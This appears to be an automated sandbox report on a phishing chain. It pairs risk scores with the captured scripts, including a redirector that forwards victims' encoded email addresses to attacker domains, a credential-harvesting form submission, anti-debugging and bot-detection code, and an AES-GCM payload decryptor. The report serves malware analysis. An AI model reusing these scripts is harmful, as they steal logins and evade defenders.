| URL: email Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": [
"No headers provided to analyze",
"Cannot make security assessment without header information",
"Default to low risk score due to lack of evidence"
]
} |
Date: unknown
|
| URL: :// Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false,
"reasoning": "This is an invalid URL format missing protocol and domain information"
} |
URL: :// |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be a simple simulation of document loading, with a 5-second delay before updating the DOM and changing the background color. There are no high-risk indicators, and the behavior is consistent with typical web page loading and visual cues. This script poses a low risk."
} |
// Simulate document loading
setTimeout(() => {
document.querySelector('.loading-text').textContent = 'Document is ready!';
document.body.style.backgroundColor = '#e0ffe0'; // Change background as a cue
}, 5000); // Adjust loading time as needed
|
| URL: https://pending-revew.pages.dev/#?service=Wm5kcGJH... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates several behaviors that raise moderate security concerns, including data exfiltration, use of obfuscated URLs, and external data transmission. While the script appears to have a legitimate purpose, such as validating a key, the way it handles user data and interacts with external domains requires further review."
} |
function javascriptCallback() {
var hashValue = window.location.hash.substr(1);
var hash2 = hashValue.split("#")[1];
// console.log(hash2[1]);
const urlParams = new URLSearchParams(hashValue);
const name = urlParams.get('service');
// Decode the Base64-encoded value
var decodedValue = atob(name);
console.log(decodedValue);
var parts = decodedValue.split("&");
var mails = parts[0];
var mails2 = atob(mails);
console.log(mails2);
var key = parts[1];
var display = parts[2];
var form = new FormData();
// form.append("subs", `${mails}&${key}`);
// var settings = {
// url: "https://arab-oil.online",
// method: "GET",
// timeout: 0,
// headers: {
// Cookie:
// "XSRF-TOKEN=eyJpdiI6IlpiamxlYlM5dldGVzNzNG9KUGZieVE9PSIsInZhbHVlIjoiTldmM0hJYnlmN3Y0d1FSUjJ2WE9INWFhUi9IMFJLeDUxZWp0L0tVWFFqK3V6dHdKS08wQkJIQUpnNWo3eVFTOXFOOHV5ZmdxRXAxMkl0WVZrSGdRb1JoOWVsM2NCUVlLSkhkQVNHY0VYS0g4T1gxWnorT0RyVnByOWoxcWlaRm4iLCJtYWMiOiI0NzU4YTdiNWFhYWUyZjEyYzU0OWEyZjAyNjU1Y2YwZjE5NzEzOWVkMzhjZGVmNzg1MmZiMjU5YTA5N2IwYzNkIn0%3D; laravel_session=eyJpdiI6Im43cHVMbGJBL1JpMjl1cU5rQ1JpYnc9PSIsInZhbHVlIjoiekkzRlNmZ25kR1dxU3JxYnFucGUrcW1MdS9CaXFwM3pqNitXNjBFQ2lyT1pTeDQ3WWtwUXBXMVlyelVHaVlncGFXR3d6Zm5VTWMxbUthSkdUVkZSMFB3M29uQUNqZzB6QWZ1V1RXb3BiMnoyZms3NkpxWXFnbjlsZVJsaE1kTTgiLCJtYWMiOiJiMDdkOTlmMmVlNTFjZjE4YjJmZWNmNjcwMjliMjg2ZmYzZTdmMzE0ZWFhODczZjdiZTg2ODRjZjE4N2RhOTU2In0%3D",
// },
// processData: false,
// mimeType: "multipart/form-data",
// contentType: false,
// data: form,
// };
var settings = {
"url": `https://natrium100gram.site/public/api/validate_key/${key}`,
"method": "GET",
"timeout": 0,
"processData": false,
"mimeType": "multipart/form-data",
"contentType": false,
"data": form
};
$.ajax(settings).done(function (response) {
var res = JSON.parse(response);
console.log(res);
var next = res.optional_url ? res.optional_url : "";
if (res.url_target == undefined) {
console.log("undefined");
location.reload();
}else{
if (display == "a") {
console.log(mails2);
window.location.replace(res.url_target + mails2 + next);
} else {
window.location.replace(res.url_target + mails + next);
}
}
}).fail(function(error){
if (error.status == 401) {
document.body.removeAttribute('style');
document.getElementById("mm").innerHTML = "";
document.getElementById("mm").innerHTML = "Expired API || contact your support ! ";
}
console.log(error.status);
});
}
setTimeout(() => {
javascriptCallback()
}, 1000);
// });
|
| URL: https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMEN... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script fetches data from a potentially suspicious domain and then opens a new window with a URL that includes encoded parameters. This behavior is highly suspicious and indicates a potential phishing or malicious activity."
} |
const urlx = 'https://natrium100gram.site/public/api/page/redirect';
// Function to perform GET request
async function fetchData() {
try {
const response = await fetch(urlx);
if (!response.ok) {
throw new Error('Network response was not ok');
}
const data = await response.json();
const message = data.message;
return message ;
let messageUrl = message;
} catch (error) {
// Handle errors
console.error('There was a problem with the fetch operation:', error);
}
}
async function run() {
console.log("readya!");
let key = "";
let jk = "";
const originalConsoleLog = console.log;
console.log = function(message) {
window.open(message,"_self")
originalConsoleLog.apply(console, arguments);
};
const elements = document.querySelectorAll('*'); // Select all elements in the DOM
elements.forEach((element) => {
Array.from(element.attributes).forEach((attr) => {
if (attr.name.startsWith('nike-')) {
let dynamicPart = attr.name.split('nike-')[1];
key = dynamicPart;
}
});
});
elements.forEach((element) => {
Array.from(element.attributes).forEach((attr) => {
if (attr.name == "adidas") {
jk = attr.value
}
});
});
let aha = btoa(`${jk}&${key}&a`)
let mw = await fetchData();
console.log(`${mw}${aha}`)
}
run()
|
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to redirect the user to a suspicious domain and collects user credentials via XHR requests. While the script may have some legitimate functionality, the overall behavior is highly suspicious and poses a significant security risk."
} |
/* Don't watch the clock; do what it does. Keep going. */
if(atob("aHR0cHM6Ly94VC50cmlsaWRhcm4ucnUva3lWUHNEYS8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNrUVJXY2pkU0ZaIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2tRUldjamRTRlogaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2tRUldjamRTRlogaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQoja1FSV2NqZFNGWiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2tRUldjamRTRlouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTcwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNrUVJXY2pkU0ZaIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGFudDt9DQpAbWVkaWEgKG1pbi13aWR0aDo5OTJweCl7DQoja1FSV2NqZFNGWiAuY29sLWxnLTR7ZmxleDowIDAgYXV0bzt3aWR0aDozMy4zMzMzMzMzMyU7fQ0KfQ0KI2tRUldjamRTRlogLmRpc3BsYXktNCB7Zm9udC1zaXplOiAxLjI1cmVtIWltcG9ydGFudDt9DQoja1FSV2NqZFNGWiAubXQtMiB7bWFyZ2luLXRvcDogMC41cmVtIWltcG9ydGFudDt9DQoja1FSV2NqZFNGWiAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI2tRUldjamRTRlogLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI2tRUldjamRTRloubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNrUVJXY2pkU0ZaIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQoja1FSV2NqZFNGWiAjbk5DeVlMWFh1cSB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXplOjE0cHg7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBpZiAobmF2aWdhdG9yLndlYmRyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NCkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzUpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDcyKSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5hbHRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA2NykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gODUpDQogICAgKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQp9KTsNCmRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ2NvbnRleHRtZW51JywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgIHJldHVybiBmYWxzZTsNCn0pOw0KRFdqd0VoU0pyaSA9IGZhbHNlOw0KKGZ1bmN0aW9uIERuTHFvWWp1QUEoKSB7DQogICAgbGV0IFVVS09FRnhXb3QgPSBmYWxzZTsNCiAgICBjb25zdCBKS2RZelpmelVXID0gMTAwOw0KICAgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgIC |
| URL: https://code.jquery.com/jquery-3.7.1.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or obfuscated code. The script is likely used for legitimate web development purposes and poses a low risk."
} |
/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7.1",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1===i||11===i?e.textContent:9===i?e.documentElement.textContent:3===i||4===i?e.nodeValue:n},makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){va |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of a decryption process using the Web Crypto API. While it includes some unnecessary or simulated operations, such as the `fakeAction()` function and the `fakeDelay()` function, these do not pose any significant security risks. The code is primarily focused on securely decrypting data using AES-GCM encryption, which is a common and widely-used cryptographic algorithm. The use of the Web Crypto API and the overall structure of the code suggest a legitimate purpose, likely for data processing or secure communication. Therefore, the risk score is assessed as low (3)."
} |
const fakeAction = () => console.log("This does nothing useful.");
fakeAction();
const performDecryption = async (encryptedData, ivString, saltString, passphrase) => {
console.log("[INFO] Decryption process initiated...");
// Convert hex to Uint8Array
const hexToBytes = (hex) => {
console.log(`[DEBUG] Converting hex string: ${hex}`);
return Uint8Array.from(hex.match(/.{2}/g).map((byte) => parseInt(byte, 16)));
};
const ivArray = hexToBytes(ivString);
const saltArray = hexToBytes(saltString);
// Adding an arbitrary delay (useless operation)
const fakeDelay = () => new Promise((resolve) => {
console.log("[INFO] Simulating delay...");
setTimeout(() => {
console.log("[DEBUG] Fake delay complete.");
resolve();
}, 100);
});
// Key derivation process
const deriveKey = async (keyMaterial, salt) => {
console.log("[INFO] Deriving AES-GCM decryption key...");
return crypto.subtle.deriveKey(
{ name: "PBKDF2", salt, iterations: 100000, hash: "SHA-256" },
keyMaterial,
{ name: "AES-GCM", length: 256 },
false,
["decrypt"]
);
};
const keyMaterial = await crypto.subtle.importKey(
"raw",
new TextEncoder().encode(passphrase),
{ name: "PBKDF2" },
false,
["deriveKey"]
);
await fakeDelay(); // Just to look like more is happening
const aesKey = await deriveKey(keyMaterial, saltArray);
try {
console.log("[INFO] Attempting payload decryption...");
const decryptedBuffer = await crypto.subtle.decrypt(
{ name: "AES-GCM", iv: ivArray },
aesKey,
hexToBytes(encryptedData)
);
console.log("[SUCCESS] Payload successfully decrypted.");
return new TextDecoder().decode(decryptedBuffer);
} catch (error) {
console.error("[ERROR] Decryption failed:", error);
return null;
}
};
// Function to simulate additional data processing
const processDecryptedData = (data) => {
console.log("[INFO] Processing decrypted data...");
if (!data) {
console.error("[ERROR] No data to process.");
return;
}
const reversedData = data.split("").reverse().join("");
console.log("[INFO] Data processed (reversed):", reversedData);
return reversedData;
};
// Initialization function
(async () => {
console.log("[INFO] Script execution started...");
const payload = {
iv: "c5d54a9c69516d18fab025aa",
salt: "f2c9263a7137550b0829e316a222b86e",
data: "7c186924f7b217943e4c6487f9d39b9910bc7e640ffc082516da5a9b8caf274be8b70ffd65131a24d3f7193f6f5dd3e09d0a3fad4dcfe75feb75f009b820f7974fa3c7cd763720aec91aa95aab0121cada3f156e35e520eb549e4f0c4b3efd501a525f8e3df5ff4bdde38199df65ddb856d5304bed2dba800983ecb1af1d7b6481700ddc96c5f3647cf54a430e067be7e01beb2ddd09e0bf4795d77e4e69c4459c8a926bc922680f55877eb0cf57b26d2450952d66fb175206cd3d15257f8eed99d48bfd50931242"
};
console.log("[INFO] Payload details:", payload);
try {
const decryptedContent = await performDecryption(
payload.data,
payload.iv,
payload.salt,
"quickescape"
);
if (decryptedContent) {
consol |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
| URL: https://pending-revew.pages.dev/#?service=Wm5kcGJHeHBZVzF6UUd4cFpuUnZibVV1Ym1WMCZtaW5kZWQmYQ== Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://pending-revew.pages.dev/#?service=Wm5kcGJHeHBZVzF6UUd4cFpuUnZibVV1Ym1WMCZtaW5kZWQmYQ== Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: file:///C:/Users/user/Desktop/A_C_H_JAN14.htm Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://pending-revew.pages.dev Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true,
"reasoning": "The URL contains a misspelling of 'review' as 'revew' which indicates typosquatting. The .pages.dev TLD is associated with Cloudflare Pages hosting service, which is often used by attackers for phishing. The word 'pending' combined with misspelled 'review' suggests this could be part of a social engineering attempt."
} |
URL: https://pending-revew.pages.dev |
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It appears to be a malicious script designed to steal user credentials and redirect users to a fake login page."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA4xpzEaQEpRQpIL',
'error-callback': hPoDXpogAg,
callback: BuDZdfoaPX,
});
function hPoDXpogAg() {
turnstile.reset();
}
function BuDZdfoaPX() {
var WbqDstIrMB = document.getElementById("sAEfAVqNlU");
WbqDstIrMB.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = 'G1xR';
var ZYZYrhNAUG = "../ajUJtRdwHvwJrv0SEjffkvEsFopli1d9b20eaw5hcAzZYVzp";
fetch('https://28ZzsybdJk0eKq73I4YSPru9QNFwtLsrunK3OZ3pso0NwaBTU6O2Hbkp.expritraw.ru/59249373081356693796BKuIhZlKCHKZWCELTQXTVDBTVYPKYLVVFVVLDUFKKLYBUDJYEXIMRVXK', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(ZYZYrhNAUG, {
method: "POST",
body: new FormData(WbqDstIrMB)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(DWjwEhSJri == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://login.microsoftonline.com');
}
});
}
if(text != 0){
window.location.replace('https://login.microsoftonline.com');
}
})
.catch(error => {
window.location.replace('https://login.microsoftonline.com');
});
}
|
| URL: https://topimo.trilidarn.ru/kyVPsDa/#Mfwilliams@li... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of phishing or other malicious activities."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
DWjwEhSJri = false;
(function DnLqoYjuAA() {
let UUKOEFxWot = false;
const JKdYzZfzUW = 100;
setInterval(function() {
const epJSaIoHAj = performance.now();
debugger;
const TBkFgpHMuq = performance.now();
if (TBkFgpHMuq - epJSaIoHAj > JKdYzZfzUW && !UUKOEFxWot) {
DWjwEhSJri = true;
UUKOEFxWot = true;
window.location.replace('https://login.microsoftonline.com');
}
}, 100);
})();
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate and common practice for web security. The script sets up various configuration options for the Cloudflare challenge and includes functionality to handle communication between the parent window and the challenge widget. While the script uses some techniques that could be considered moderately risky, such as dynamic message handling and communication with external domains, the overall context and purpose of the script suggest it is not malicious. The risk score is low due to the legitimate use case and the lack of clear indicators of harmful intent."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '479g3',
chlApiSitekey: '0x4AAAAAAA4xpzEaQEpRQpIL',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'elyaO1GRqzNaXmY5nKkbenA2fH74o.xLnk9cCTIKynY-1736976277-1.3.1.1-ylu.MOeMKTEQd4EVgAOVrMDho_apo6TFjPzxQ8L6Apw',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '9028ef0719b60f73',
cH: 'k9HmTheYQXlQ1L664RRcwhyZacGCOT8tYk32R0lFWGo-1736976277-1.1.1.1-BDGrV3x_aqzYh995xZ0MCj6_Q40C3Ae3hY8Gn7TS2mUR4hZEWbDbaCoJGXci7dN8',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'aGL1QOgjTzbMDxDMPmCULuFTaMX__bG7M0CvsW1weic-1736976277-1.1.1.1-UlYQoFunXU1_64__dgxCn7E58fVQQGjg34Qe55zM5J8batoz5Ke4f3hykopmGUPjFPeoeTx7dAZsH6zGl2Lt4rTOPwM9qtHYUVAkXyCbIBScxL1zlWm3ezIb4oYUa8RZP58pD48aVMAZUmJQFLTmxON5z7dyiDv6asqp_OX3GkCYRqlbikpyBrf48wlriwLYJVIV7n520UoV1DMpJ6BK7KqgbrHI9hGCs60gi2I9t6kjWopIW7Q.FRGpjWLJjgX5K9z0AV6yyNNGGenp5vChg23ok57wdjsYsYNloFnqt3UjFxW5mFa5Tx4dQ_l3QIozFqgMahFtOCxPUX4duY.IXgtvIlPONRfOaEBPuCHjnA6dTL.2S49qi68BMIDSESe_vYHjcb9yelfKHJmwiQdYhubx.BF6Ot5Lfs3t3DLhGZJO.TJZEf4dmrm2RXiE1GY97Gucwf5U_67FNgQ3NtdWzjQ2Q8bAb1V1kRqKamyGijNt77bBk1UfemgfOUJ903GDs9STpxyzgfwNzKiTM0S8fYjfwHSXGJnx7v0ZIlh8VYr1A3deV4Jhd.4opaq85gapZJyITmKEzgVEmhBODSwXR5cu8YJ0MoPbd7MGU6VIupe8tvLNSysm1ABVu8B_EV8YgiNo1aJaVDB4FSuQG0DIpAB69tvRuWbJx7qqPYDSq1rXKZum1hjc2iItR6r18rLXK6b7IHIHB.iH.ONuiNiRUafWiTfrllHO70ka7tY8KiCbk1izf7ns8hAvH2hIQi9R5KjzxFn87NwPqC2vAZGdLTg.SXSFS7NdQXprUP0cSkkanW9oj.u7S_WDd7yXbbxjBfAaHzM5.WdBCeNzMz.3C5uQ86r1yfpP0BI.tRy6i85p3UpNFA3svGJISHD5uWzc6Y6yQmlmoGlZi8t9Rm8MFxU9opujrokCYfeVwPlhp7fxivoThSIwwtqMQlSlz